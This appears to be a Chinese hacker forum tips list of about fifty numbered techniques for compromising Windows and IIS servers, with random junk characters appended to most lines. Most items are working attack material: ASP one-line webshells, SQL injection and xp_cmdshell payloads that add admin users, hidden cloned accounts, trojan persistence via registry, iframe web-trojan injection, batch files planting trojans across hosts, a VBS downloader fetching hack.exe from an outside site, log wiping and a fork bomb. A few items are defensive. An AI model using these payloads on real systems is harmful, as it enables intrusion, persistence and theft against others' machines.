1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,( }7 E$ e- v8 l6 Z4 S% z, _
cacls C:\windows\system32 /G hqw20:R t @! u: T1 z- `9 j, j, w+ S S; d+ u
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
5 w1 Z% _+ {4 N. A* C- X! G恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
8 e. O' K+ Q1 a: L O5 T
/ q: g- V9 l7 B7 @) C! L2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
; c# \* I: [' {7 r6 Y! L$ d7 ^ A) q3 n( Z
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。' u# k" Z4 \1 y9 a- Q! _
; P5 Y- k' p) S6 n/ S) u) H4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号, @; ^3 @* w2 O! u
A4 r. w: s" H, D1 T
5、利用INF文件来修改注册表2 C' r6 u, L) o% d% X/ K& }1 c
[Version]) ~1 |1 W% W! P9 M) }! f+ c0 Z
Signature="$CHICAGO$"
# g, a8 X! e- I" J% e[Defaultinstall]1 k- _9 @( s* L! N5 X; a
addREG=Ating
8 b( \/ x7 _. b5 ] E c[Ating]7 X! z/ l* l6 e: j y
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"8 _9 t5 q, w& e: P
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
; [! g5 P( w" q6 z5 srundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
, B s; v, J* M% R4 b! m其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU1 |' C; S' {. R
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
. [5 C7 S, C* N, _% rHKEY_CURRENT_CONFIG 简写为 HKCC
7 f$ Y5 {# G2 E8 E8 e$ i0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
* R' V/ n2 y, {5 `$ @. m"1"这里代表是写入或删除注册表键值中的具体数据& l& s& `- g* V! i
$ `/ H, g3 a0 I' }6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
5 j$ G9 d" \* W: L多了一步就是在防火墙里添加个端口,然后导出其键值
% d0 h. {: }6 Y& x& M[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]: @) h6 G8 ^2 J$ b; C
1 c; e# H4 V! N# ?" W5 ~0 ]7 G: J
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽$ h( X* W# N' \) C+ f2 q' R
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。* g# Z) I6 R% y( R: I
1 k5 }1 J4 r( ?8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。! j) u) H5 F/ B# f% n
F S/ [* l6 F4 G. ?9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
, g1 N6 x8 f E& F! `0 B3 r可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
( C+ t0 I, O U. }# D7 L! F" t. @8 l4 y7 Q+ y: ?& Z
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”; Q5 W; {1 @4 Q/ w6 [/ q2 I
, N) w1 c) x5 S1 I; g3 o
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
6 a' w# r8 n+ G% d) [, |( u用法:xsniff –pass –hide –log pass.txt/ V, q/ L7 `- j1 a6 | i0 Y
3 e0 L. p% s5 f- p: z6 Z2 V5 N7 c12、google搜索的艺术8 D# y. @; }% N Z
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
6 A2 n* R( ?0 O! T- T; D或“字符串的语法错误”可以找到很多sql注入漏洞。
7 Y5 P% @1 N9 O& s2 h# z- a
$ e, H% T6 v4 `: p13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。; `3 ]5 }" b4 H8 J! [; Y
# U5 R" c1 o, J& S14、cmd中输入 nc –vv –l –p 1987
' `* c" @" l$ e: c做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃8 {" z' c2 ^" H( p% g
# g4 l2 z! r, ^: E$ g' b
15、制作T++木马,先写个ating.hta文件,内容为
. ?" V y7 y' @8 T5 a* o2 Z2 b8 U<script language="VBScript">
3 a$ u3 X3 g5 Zset wshshell=createobject ("wscript.shell" )/ y/ {$ G4 U0 F) q5 g
a=wshshell.run("你马的名称",1)
4 C# n& p( x! ?" J# S3 g1 Jwindow.close% e8 u# h' @" s- N
</script>0 }1 a# U: P4 O$ U, c. _
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。4 \/ @! c7 p) M
8 e `0 `3 {: F# S9 t/ L2 Y& K16、搜索栏里输入
- X$ U5 Z- a2 x. g关键字%'and 1=1 and '%'='5 w1 w* X1 s$ p( F
关键字%'and 1=2 and '%'='
# m, e8 ^/ _- s* v比较不同处 可以作为注入的特征字符
$ b- y( ~( B7 \$ d; d! K. J: s) g
9 V9 H1 f5 T0 X6 N% w" @3 c17、挂马代码<html>
, ?5 W m1 D7 K, I9 N& V<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>9 ^5 ]4 _7 l# x$ R0 s- H) m4 B
</html>
* Z J' k& L" a# y" M4 x. e) B$ h \4 C b8 f# d# l& r* q
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
9 l; j# _4 G3 t: M! Xnet localgroup administrators还是可以看出Guest是管理员来。
m! X4 l+ y, \" T; r; h# Y
; W0 w# e9 p: Q; P19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等( K& b+ _. {% M9 @1 [$ x/ p! E; [: l
用法: 安装: instsrv.exe 服务名称 路径9 ^) r+ E! M @: x( z! M
卸载: instsrv.exe 服务名称 REMOVE5 V1 G& i2 G9 ?2 b1 ]
6 E1 ^( H. X8 W) Z. [
$ @0 b/ M& M2 [- ~
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉& \4 [0 o9 o7 f) A) h, s. X1 O
不能注入时要第一时间想到%5c暴库。
, L. l* ?% P# A4 E; o: G( I& r8 \2 Z
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~( b$ H: M- o/ E& [ e
3 W, Y7 }% H8 |1 t$ i4 p; ?
23、缺少xp_cmdshell时
$ c) s/ t9 i& V1 V尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
3 Z4 q" _9 M; j! J# W9 N$ ]$ d! v假如恢复不成功,可以尝试直接加用户(针对开3389的) b- H! l( j9 T% v- g
declare @o int
% R5 D% a$ h" b: T1 p( @- |1 xexec sp_oacreate 'wscript.shell',@o out* j: M0 p+ Y: A! J0 n/ S8 Y
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员# @# X8 r+ }1 M* ]. h
% x0 D1 F* @( E+ Z24.批量种植木马.bat% L1 h# j s( X+ z6 n
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中- L3 g: ^$ Y h6 B+ m; r8 Y
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
9 }; d, V3 q7 u2 b+ U' J扫描地址.txt里每个主机名一行 用\\开头
' t6 T: i2 v# j# F# c% ]0 o3 P
7 C4 g* a* @6 B9 ]25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
1 E8 J& f3 R: g3 |
0 }) x* I2 R1 u# m. W3 g6 T26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.' D) H" k: \ I6 A ?" a
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
! m3 F3 f/ s7 {$ x! p) r- \6 U5 T; h.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
% p; U8 _/ M& r/ J7 K. G: n9 J1 M+ [$ Q2 I4 e4 V
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP" A5 |, X/ p" h) @6 G' ]
然后用#clear logg和#clear line vty *删除日志
) q* o8 x b) `6 |
f) f; ~4 [$ K28、电脑坏了省去重新安装系统的方法
' V$ A) U$ E- r5 \; ?8 h2 o9 p q纯dos下执行,
% }" R+ O" J9 ^5 {1 Jxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
W. R/ J6 M9 f1 S2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config b4 ^/ f5 N" b" P" l
5 @$ I8 y" U. Y* X29、解决TCP/IP筛选 在注册表里有三处,分别是:! I+ @( u, X. ^3 |5 V
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip7 K2 S0 Z. U" }- [- P! s
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip# o# t, m9 n0 h5 b/ @ }0 l# _
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& |$ T6 y1 d4 r* m/ ]1 n分别用% H0 D; h& J* }9 q+ }
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
, Q0 a. }! O4 O, P9 `regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip* J) d0 }8 ~1 \+ Z3 g! z
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
! l( b [- t g3 z" x命令来导出注册表项
! ?$ T2 g" R" Z8 \# H. U! L! `然后把三个文件里的EnableSecurityFilters"=dword:00000001,- r$ F3 b: a1 M7 [( {, X) C
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
* J9 r/ ^5 w: G4 [4 Y, N% Sregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。8 K) U: q% {. @* W( A
2 x& k( y5 h \! J" b; A30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
! i$ m) n& }2 r8 eSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
, A, d" u/ I% {! F* r3 A2 E( U
$ G# M* g+ y( G$ l6 j; u31、全手工打造开3389工具
$ \" H- D. v s: W$ u打开记事本,编辑内容如下:) }. u3 i! Z( _
echo [Components] > c:\sql
) e5 e5 K+ O/ x4 }7 |' kecho TSEnable = on >> c:\sql4 i' G: O& S$ X s
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q- K5 I% h6 l4 n5 o- U& g; F' p
编辑好后存为BAT文件,上传至肉鸡,执行
3 f; z& U; Z7 D, Z7 P6 v2 @& X. A" m' ?5 j4 p( \( W A+ g
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
, K; C# W3 q% r* p
" D0 \2 i; K/ K( [$ R33、让服务器重启7 C1 I3 H2 ]+ q9 d4 G: C! }0 K
写个bat死循环:, I$ L; @# [: h- B7 ^% \1 k! {
@echo off
* f: z" n% z8 v+ U/ ~:loop1% b# {- R, c) I/ K0 x
cls
# f# i! h7 j. ?' \8 }' P4 M0 k6 Ustart cmd.exe
$ x% i* L2 |3 e& a4 L$ Y) @9 g Mgoto loop14 h r! R$ N2 _' Y. Y
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
O ~6 E% U, n1 N% s$ w2 p: k7 u4 Q
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
8 w+ O6 m9 v+ n& ?0 U@echo off
* R' m7 Y# n8 J$ }date /t >c:/3389.txt @( y8 g- I$ d. |3 j
time /t >>c:/3389.txt
$ y: ~2 J7 w: E# M! N+ Zattrib +s +h c:/3389.bat1 h4 v% f+ H5 @% V# `8 P
attrib +s +h c:/3389.txt% z4 e6 c4 j0 }, Z% D0 p, {
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt: `' f) z9 ?. w q4 |
并保存为3389.bat9 V3 x5 ^6 x8 q: O8 ~$ w
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号( N! ^3 @: _3 _$ E" P
) R" u" [( b, v6 }. o& \
35、有时候提不了权限的话,试试这个命令,在命令行里输入:/ t* t6 p# I6 W z
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
1 ~0 W3 {8 U4 x* B% O输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。7 X# r4 v( |7 C- _( z
( m7 n( l( J+ ^6 S! H36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
5 Q* I+ r/ J' _+ Uecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
1 [* b& f& e0 H8 c# I. ]$ s' aecho 你的FTP账号 >>c:\1.bat //输入账号; A4 [! q) h7 j( O% _4 X& A0 p
echo 你的FTP密码 >>c:\1.bat //输入密码
. H; x- s+ I$ m9 v8 _echo bin >>c:\1.bat //登入# ?* G& o2 ^8 f1 m( [/ c
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么 N3 |2 s2 Q8 u4 p
echo bye >>c:\1.bat //退出
0 c! C8 s- p; |然后执行ftp -s:c:\1.bat即可
, J. I! z. L) n- E4 @' S4 o0 J" o% @2 b8 I4 `# G" ?
37、修改注册表开3389两法
- x# l& q( W; n }+ W(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表6 Q* s6 ~8 l) R$ }' E" G/ u' u% Y
echo Windows Registry Editor Version 5.00 >>3389.reg
# B8 `6 M) l, e l( r8 Zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg1 d6 n8 y9 o7 @! ]* Z/ m
echo "Enabled"="0" >>3389.reg
. H2 S9 Q8 z& I8 @- Necho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows/ Z" k. v. B' C$ M) e" v
NT\CurrentVersion\Winlogon] >>3389.reg
. _) M3 g& d8 I* M" i' m: jecho "ShutdownWithoutLogon"="0" >>3389.reg
: `6 ]! f% X: g Q% l6 j7 o: yecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
; P8 r4 g) n" @5 U- i" F; }" D>>3389.reg
# m& O6 M. T1 ]# L6 a( becho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
0 T: V: \) U: ]& v- vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]/ y) r3 y, ?- `% b5 ?3 E8 o& ]. D
>>3389.reg
/ ^: Y" K2 x0 Recho "TSEnabled"=dword:00000001 >>3389.reg3 V9 w1 v1 z- ]8 n9 d. W
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
2 u" C* B9 i; o6 @8 ~+ q i$ J2 R, v) a1 Mecho "Start"=dword:00000002 >>3389.reg
* p( t0 @3 E5 \- {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]- U, h5 M! c4 E" v: c# Q- P
>>3389.reg
. X* t) j0 ^: ~4 O( f1 W) A/ Yecho "Start"=dword:00000002 >>3389.reg# c; Y, c" V# s
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
7 a C7 G! a6 F8 A. H% X5 vecho "Hotkey"="1" >>3389.reg; X5 P- {* ~/ O0 c- S; L5 G4 e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal$ O$ w4 C/ u7 M
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
7 O2 ]( n0 h3 {; ^; uecho "PortNumber"=dword:00000D3D >>3389.reg( g5 Y# `- N) [) W' W: l7 d/ A% Z. z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( L8 S2 S1 ^) T; ~- Y8 _5 }& ~Server\WinStations\RDP-Tcp] >>3389.reg
' H7 u$ h4 ~1 _& ~echo "PortNumber"=dword:00000D3D >>3389.reg
6 t" [# k7 h4 Y: }) Y3 G1 q把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
2 [& _' e8 ^8 y7 o) M7 P(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
0 I; y2 j! c9 Y4 c4 e' L8 S因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效, J: T. s; i' C# k' T1 L' P1 M
(2)winxp和win2003终端开启
- |& b" u+ [* W" T5 O用以下ECHO代码写一个REG文件:
, r% {5 J' g7 M" R9 |echo Windows Registry Editor Version 5.00>>3389.reg; J1 I4 l1 y( y5 s/ x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 w! j% `' C2 x. y: f
Server]>>3389.reg
5 a6 U6 t# o) H1 W9 O9 u1 Iecho "fDenyTSConnections"=dword:00000000>>3389.reg( r. T9 E( j) d i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal [- g7 Z0 a5 ?2 s. Z0 x6 a" N, k! i
Server\Wds\rdpwd\Tds\tcp]>>3389.reg% C6 A" C' Z/ M) O# X) X1 t
echo "PortNumber"=dword:00000d3d>>3389.reg
& h7 i' S6 Y) d. j; Yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 a7 V/ b, {2 u4 C" iServer\WinStations\RDP-Tcp]>>3389.reg
+ m& e4 U+ F s6 `7 O" ^echo "PortNumber"=dword:00000d3d>>3389.reg+ v" @" P4 _) q% n5 n: B
然后regedit /s 3389.reg del 3389.reg
2 L' B/ a" k1 O- CXP下不论开终端还是改终端端口都不需重启 R5 u3 i+ e1 G. Z8 k
) D0 m0 G T/ e! O
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃0 J- L' t- _. u/ {* e1 n
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
) u& T5 M f$ X9 F6 Y G# z7 `' U
: O! [' x& j- |( C! L. a7 X: V5 u5 I39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
3 @6 g+ n. @. I5 h! R(1)数据库文件名应复杂并要有特殊字符; w2 n8 k" A2 L% T% o
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
* y6 a9 f6 p" h# s& k将conn.asp文档中的/ T0 ?5 _" Y& S" Z
DBPath = Server.MapPath("数据库.mdb")2 y) K" i/ Z# E
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath! L( g- F7 }3 H9 |' ?
4 n+ Y( Q v! v7 x1 U修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置8 f- x1 j1 D" `. V9 a
(3)不放在WEB目录里
0 `8 M0 x+ Y8 S# Z0 a0 @3 F2 g# g: L! G2 Y
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉, S' ]9 x$ k' W t. u
可以写两个bat文件% F* G$ b, V7 C/ s
@echo off, ]. s- O. I4 J! H
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe' z- T& E, @( J1 m' H8 n" e
@del c:\winnt\system32\query.exe
! i" U: a( Y2 A; V@del %SYSTEMROOT%\system32\dllcache\query.exe
) u, v* \) e, p9 T7 S! Z@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的$ _& x3 Q7 ^+ X# I, \
5 T2 q) Z1 u0 {3 _/ Z
@echo off t4 O+ j# {0 n" Z/ Q, l0 c: g
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
: ^) |7 q% V# |# G@del c:\winnt\system32\tsadmin.exe
6 u8 N0 p- b/ O1 J0 _@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex2 ^9 r7 A/ T" G7 L3 f! _' A, N
' q9 U6 t+ L" ^3 B4 a) Q41、映射对方盘符5 p+ K+ t: B% N# ]& Y: H2 S, h
telnet到他的机器上,
+ W7 a6 h8 l" O5 _8 \net share 查看有没有默认共享 如果没有,那么就接着运行
5 @' P7 m" ?5 s onet share c$=c:' I0 L3 a4 U' J) ?5 m; ^
net share现在有c$- L9 d7 _+ Q9 g% f+ f
在自己的机器上运行& l9 ]' @, r. T& ~8 O
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K8 E* W5 w6 y% A; l6 `4 o
; P( m9 p* @- l
42、一些很有用的老知识- e: v" o9 K7 W2 E; r, M
type c:\boot.ini ( 查看系统版本 )
6 F! p6 h. W9 mnet start (查看已经启动的服务)
8 u- c" F' p# O" E( mquery user ( 查看当前终端连接 )5 V2 x5 E! s$ r/ Z: d
net user ( 查看当前用户 )% @5 ]% @+ f# b2 [$ r8 z
net user 用户 密码/add ( 建立账号 )/ @% i- s5 `. |# W
net localgroup administrators 用户 /add (提升某用户为管理员)
% _# a M ~1 G) g7 P; }% T+ C. hipconfig -all ( 查看IP什么的 )5 J: n4 q4 a5 C" e; r/ A
netstat -an ( 查看当前网络状态 )
' X h& V+ _' [% \3 Y) R: Y3 kfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码). j5 R f' u& v# Q
克隆时Administrator对应1F4
0 w h5 E+ h. G0 n6 H0 mguest对应1F5
! L, ]2 H3 c' R4 a4 Ttsinternetuser对应3E8
- _* }2 }& g7 c: d+ Q) K$ E9 r5 S! q0 \7 K+ q* O- [8 O6 g7 S0 Y
43、如果对方没开3389,但是装了Remote Administrator Service
2 d2 i: c2 g3 Q" z5 A4 c用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接/ h# G; \ p, L6 j! I8 B2 y7 z
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息$ y, _+ }0 `1 ]
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
5 w p5 Z( ]* u0 I. @; S5 k
: [3 x# h& T$ v* |' }' Y% c44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
) `: g& O6 B0 C3 T) y i本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)/ o7 j, I: W. f1 G- a2 j2 G: r3 N
* |6 v0 i) @( R45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)( f: v* k& H, A: X( ]& C
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open/ d1 ~+ J+ \" u: T, [8 R# z. ^
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = u# b1 j9 b7 z3 H7 b& @( P
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =! q* r# b# M% R! c! S/ m; u
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
: T% m. B- A& m c" S(这是完整的一句话,其中没有换行符)
% Z* S% ?6 P! e' p然后下载:
9 e7 E) [. [% E' ^# x) Z* P) ^cscript down.vbs http://www.hack520.org/hack.exe hack.exe
+ u" t7 Y! I1 e* ~8 }
2 `( u- C7 h" n3 D" s% W46、一句话木马成功依赖于两个条件:
; y* u1 I; w) p, [% E# [9 L1、服务端没有禁止adodb.Stream或FSO组件9 z2 p& r$ O- v
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。7 i, e/ Z: i3 w; d Z1 h
[$ ^5 [0 G0 \. m8 V+ t7 `; E47、利用DB_OWNER权限进行手工备份一句话木马的代码:
( m' @3 q$ G' K4 e, i( F' P& M;alter database utsz set RECOVERY FULL--' b2 g* Z7 U; h0 ~& k
;create table cmd (a image)--
# J8 e& V" U. G/ c;backup log utsz to disk = 'D:\cmd' with init--+ W) F( w) M0 a, L( K2 f5 {
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
/ R- [) o$ ]2 y1 }; O;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
% F6 S- X8 V1 K8 x8 [注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
% y# X$ V0 c, f1 M( V3 D5 S
0 k& W1 u8 k. N G48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
: n5 p, D' u: F; ^/ S; b4 u
$ t, |0 y; `* L4 m4 I用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options3 c6 z" |3 Q+ z. `. @
所有会话用 'all'。- k3 b5 X7 v# r, `
-s sessionid 列出会话的信息。
4 L3 Y' k7 a/ ]& _-k sessionid 终止会话。
* |/ t/ V7 G l$ v-m sessionid 发送消息到会话。
* H5 W9 R8 H+ T( v. A' R6 z/ a2 ] Q f& I0 ~
config 配置 telnet 服务器参数。
9 D+ v1 [+ b$ }8 Z6 {" x/ a+ L7 M+ z2 o" z
common_options 为:# k W7 f) i& M# P+ q3 M; D3 n
-u user 指定要使用其凭据的用户
6 g8 b, V0 g1 X% X-p password 用户密码
' A3 t0 X/ E9 a3 k: }- {, b
3 n- I4 d; E& g( N# Fconfig_options 为:
( X6 g9 Z/ G2 }( _) e' hdom = domain 设定用户的默认域
5 c( ^# U" _+ P3 o f {ctrlakeymap = yes|no 设定 ALT 键的映射
, p0 C: E( y3 N) U9 p2 P, jtimeout = hh:mm:ss 设定空闲会话超时值
6 q2 t. C. B* H1 ztimeoutactive = yes|no 启用空闲会话。6 w2 E- B8 t5 ~, w3 P
maxfail = attempts 设定断开前失败的登录企图数。
3 V& `$ z: X. ?9 z) g5 dmaxconn = connections 设定最大连接数。
$ R; w6 U1 p1 c7 g. Qport = number 设定 telnet 端口。
, g* G+ c) H' ]4 T6 nsec = [+/-]NTLM [+/-]passwd8 R9 R% g" ?! M& f* M( r5 I
设定身份验证机构( y' b, T( \6 w% N' A3 e- \
fname = file 指定审计文件名。' L: z7 L- l \. M( K
fsize = size 指定审计文件的最大尺寸(MB)。4 {* M9 E' I" K- g5 D
mode = console|stream 指定操作模式。* T* o+ d5 T0 K8 m+ l9 ?0 I2 I+ N2 n
auditlocation = eventlog|file|both& }8 r3 i! T0 d' \( E; P7 x) e
指定记录地点( d& n* Z# }. `& m5 F
audit = [+/-]user [+/-]fail [+/-]admin
/ c, U& Q5 B+ I6 K/ t t: X1 P" w. E& W* Z
49、例如:在IE上访问:# g) R0 f7 ^' ?0 w# b8 ]
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
( w0 C, v k' V2 chack.txt里面的代码是:' J6 H) p, [, r& ?9 R
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/"># j& Z0 K5 D: u/ h
把这个hack.txt发到你空间就可以了!
& g; `, i( |/ ~7 r/ x" I这个可以利用来做网马哦!
0 [9 G, E1 j! b4 ?
( C% P1 g2 e& M" l; y50、autorun的病毒可以通过手动限制!
6 a8 k9 h/ n: U" q1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
9 A. s% l$ s* A5 v0 A6 c2,打开盘符用右键打开!切忌双击盘符~
2 I& d4 C+ Q8 t4 s& B0 t( v) R3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
% P9 ?# F4 |4 q+ E/ @- u" o- P! u) x0 u9 H- \9 ~
51、log备份时的一句话木马:
- d4 |# H' f! Q, F, r/ la).<%%25Execute(request("go"))%%25>+ ~4 t9 |/ b7 m' y+ A0 g: l
b).<%Execute(request("go"))%>* q; X" [4 @9 i; V- O5 U
c).%><%execute request("go")%><%
4 V4 ^6 K8 M4 hd).<script language=VBScript runat=server>execute request("sb")</Script>
2 ?2 {5 K% \4 C2 I" g( u) me).<%25Execute(request("l"))%25>( s( c5 v2 j, \
f).<%if request("cmd")<>"" then execute request("pass")%>
6 X0 c3 ?, Z+ ]- R
4 a' D2 k. n/ H+ R% U n( i- N& p1 A52、at "12:17" /interactive cmd$ |/ {8 H# |2 s9 U! q# n7 k
执行后可以用AT命令查看新加的任务. ^/ ]) b9 e. T% M5 M* T* ]
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
% ?% D% |" f6 i; V p: X/ a
